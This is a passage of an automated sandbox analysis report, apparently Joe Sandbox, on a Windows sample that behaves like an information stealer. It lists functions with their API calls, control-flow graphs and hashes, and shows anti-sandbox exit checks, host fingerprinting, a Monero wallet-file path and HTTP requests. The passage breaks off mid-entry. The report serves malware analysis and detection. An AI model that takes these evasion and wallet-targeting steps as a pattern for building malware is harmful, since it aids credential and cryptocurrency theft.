                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 2d163773a6abff3a1164b516fd49f2091008e4eb348989dcb88f3666ab657c72
                      • Instruction ID: 4eec4a132e362482ae6383585eb71cfdeea199571e131e86418d275837b9b9d0
                      • Opcode Fuzzy Hash: 2d163773a6abff3a1164b516fd49f2091008e4eb348989dcb88f3666ab657c72
                      • Instruction Fuzzy Hash: D4516CF4A04209EBCB04EFA4C954BFE77B5AF44704F10C44AE50967360D778E956CB6A
                      Function 00477500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 477500-47754a GetWindowsDirectoryA 1357 477553-4775c7 GetVolumeInformationA call 478d00 * 3 1356->1357 1358 47754c 1356->1358 1365 4775d8-4775df 1357->1365 1358->1357 1366 4775e1-4775fa call 478d00 1365->1366 1367 4775fc-477617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 477619-477626 call 47a740 1367->1369 1370 477628-477658 wsprintfA call 47a740 1367->1370 1377 47767e-47768e 1369->1377 1370->1377
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00477542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0047760A
                      • wsprintfA.USER32 ref: 00477640
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$H
                      • API String ID: 1544550907-3928310333
                      • Opcode ID: 37e54d487f94721b56d2a15f0e8534554f4dcbab8e1287ed4fb29a7dc045736c
                      • Instruction ID: 369938c48f56f7a9f5c5bcdcb0437ad57daf7d274f89edbf432e8e5f8f789822
                      • Opcode Fuzzy Hash: 37e54d487f94721b56d2a15f0e8534554f4dcbab8e1287ed4fb29a7dc045736c
                      • Instruction Fuzzy Hash: B64173B1D04258ABDB10DF94DC45BEEBBB8EF48714F10419EF50967280D778AA44CFA9
                      Function 004769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E807F8), ref: 004798BA
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80810), ref: 004798D2
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E805A0), ref: 004798EA
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80840), ref: 00479903
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E88BA0), ref: 0047991B
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E765C0), ref: 00479933
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E762A0), ref: 0047994C
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E806F0), ref: 00479964
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80648), ref: 0047997C
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80708), ref: 00479995
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80558), ref: 004799AD
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E76480), ref: 004799C5
                        • Part of subcall function 00479860: GetProcAddress.KERNEL32(75900000,00E80570), ref: 004799DE
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 004611D0: ExitProcess.KERNEL32 ref: 00461211
                        • Part of subcall function 00461160: GetSystemInfo.KERNEL32(?), ref: 0046116A
                        • Part of subcall function 00461160: ExitProcess.KERNEL32 ref: 0046117E
                        • Part of subcall function 00461110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0046112B
                        • Part of subcall function 00461110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00461132
                        • Part of subcall function 00461110: ExitProcess.KERNEL32 ref: 00461143
                        • Part of subcall function 00461220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0046123E
                        • Part of subcall function 00461220: __aulldiv.LIBCMT ref: 00461258
                        • Part of subcall function 00461220: __aulldiv.LIBCMT ref: 00461266
                        • Part of subcall function 00461220: ExitProcess.KERNEL32 ref: 00461294
                        • Part of subcall function 00476770: GetUserDefaultLangID.KERNEL32 ref: 00476774
                        • Part of subcall function 00461190: ExitProcess.KERNEL32 ref: 004611C6
                        • Part of subcall function 00477850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                        • Part of subcall function 00477850: RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                        • Part of subcall function 00477850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                        • Part of subcall function 004778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                        • Part of subcall function 004778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                        • Part of subcall function 004778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00476AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00476AF9
                      • Sleep.KERNEL32(00001770), ref: 00476B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476B1A
                      • ExitProcess.KERNEL32 ref: 00476B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 5046363cf0ceb7f2e4f8255f45d87da539b2db398f67256c39a366ce81a3c825
                      • Instruction ID: 742608a79b870403eb3756a330a120e347b80ef441d0cd2c14138ee3862e1cad
                      • Opcode Fuzzy Hash: 5046363cf0ceb7f2e4f8255f45d87da539b2db398f67256c39a366ce81a3c825
                      • Instruction Fuzzy Hash: 603132709001086ADB04FBF1DC56BEE7779AF45304F11891FF216A2191EF786915CBAB
                      Function 00461220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 461220-461247 call 4789b0 GlobalMemoryStatusEx 1439 461273-46127a 1436->1439 1440 461249-461271 call 47da00 * 2 1436->1440 1442 461281-461285 1439->1442 1440->1442 1444 461287 1442->1444 1445 46129a-46129d 1442->1445 1447 461292-461294 ExitProcess 1444->1447 1448 461289-461290 1444->1448 1448->1445 1448->1447
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0046123E
                      • __aulldiv.LIBCMT ref: 00461258
                      • __aulldiv.LIBCMT ref: 00461266
                      • ExitProcess.KERNEL32 ref: 00461294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: ff9a2d77535fb552a8c36f702b662037f888bbec635b73683a692d855a7f1839
                      • Instruction ID: bc8b765212fe32282994d1423be4dfb9d525743297d40ac85fa92f2178bd6045
                      • Opcode Fuzzy Hash: ff9a2d77535fb552a8c36f702b662037f888bbec635b73683a692d855a7f1839
                      • Instruction Fuzzy Hash: AE0162B0D40308BADB10EBE1DC49B9EBB78BF04705F24845AE705B62D0E77855458B5E
                      Function 00476AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1450 476af3 1451 476b0a 1450->1451 1453 476b0c-476b22 call 476920 call 475b10 CloseHandle ExitProcess 1451->1453 1454 476aba-476ad7 call 47aad0 OpenEventA 1451->1454 1459 476af5-476b04 CloseHandle Sleep 1454->1459 1460 476ad9-476af1 call 47aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00476AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00476AF9
                      • Sleep.KERNEL32(00001770), ref: 00476B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476B1A
                      • ExitProcess.KERNEL32 ref: 00476B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: d47522e6632391298b746ab24530fdf26a7db4c8cb5bc0f247d2fba7843ffde6
                      • Instruction ID: 6c14f6501db86ab282718faab37bdf4372110155683e6fe03c41e9993249bca0
                      • Opcode Fuzzy Hash: d47522e6632391298b746ab24530fdf26a7db4c8cb5bc0f247d2fba7843ffde6
                      • Instruction Fuzzy Hash: C6F03A70940619AAE700FBA09C06BFE7A36EB05705F11D91BB50AA5181CBB86541DA6A
                      Function 004647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: cde7b223cd32a68ee27bd217dc637c80077666d85c472035dcafe7cef307a78e
                      • Instruction ID: 9dab5d16d8af7448335e834bd37e259c5521e3eefd2408c3c1fc2ae4290e93b1
                      • Opcode Fuzzy Hash: cde7b223cd32a68ee27bd217dc637c80077666d85c472035dcafe7cef307a78e
                      • Instruction Fuzzy Hash: 082162B1D00209ABDF10DFA5EC45ADE7775FB45310F108629F515A72D0EB706609CF91
                      Function 004751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 00466280: InternetOpenA.WININET(00480DFE,00000001,00000000,00000000,00000000), ref: 004662E1
                        • Part of subcall function 00466280: StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466303
                        • Part of subcall function 00466280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00466335
                        • Part of subcall function 00466280: HttpOpenRequestA.WININET(00000000,GET,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00466385
                        • Part of subcall function 00466280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004663BF
                        • Part of subcall function 00466280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004663D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00475228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 7403bab59aa73b0d4cf92aed89af4f5e944a161cb7a1fb34b3063da47bf74b53
                      • Instruction ID: 896e2dd4189cd8126bf0b759eff630b8eb30c21325648f3e4a4e93176a2b50f9
                      • Opcode Fuzzy Hash: 7403bab59aa73b0d4cf92aed89af4f5e944a161cb7a1fb34b3063da47bf74b53
                      • Instruction Fuzzy Hash: 1A111F30910008A6CB14FF65DD52AED7338AF90304F50856EF81E4A592EF78AB16CB9A
                      Function 004778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: bbb43af43b3f29ec62c5e3168af34b86e64211d4d2d2fd24c44c08d55c34aec7
                      • Instruction ID: 9132e9a31a955ceabc101e0a02199f1b55e802787ef77f08d4cd4c8f35f3f168
                      • Opcode Fuzzy Hash: bbb43af43b3f29ec62c5e3168af34b86e64211d4d2d2fd24c44c08d55c34aec7
                      • Instruction Fuzzy Hash: 0A0162F1944205EBD710DF94DD45BEABBB8FB45B11F10421BE645E2280C37869048BA6
                      Function 00461110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0046112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00461132
                      • ExitProcess.KERNEL32 ref: 00461143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 17a3791e00761e70c07cc8aab7031ae0b122ba0a69d4236031c3e84cb073cd75
                      • Instruction ID: a8dd30ac3f7f829b00f781743728ebe73bf0c8d09c7228f77b934df94537ccdb
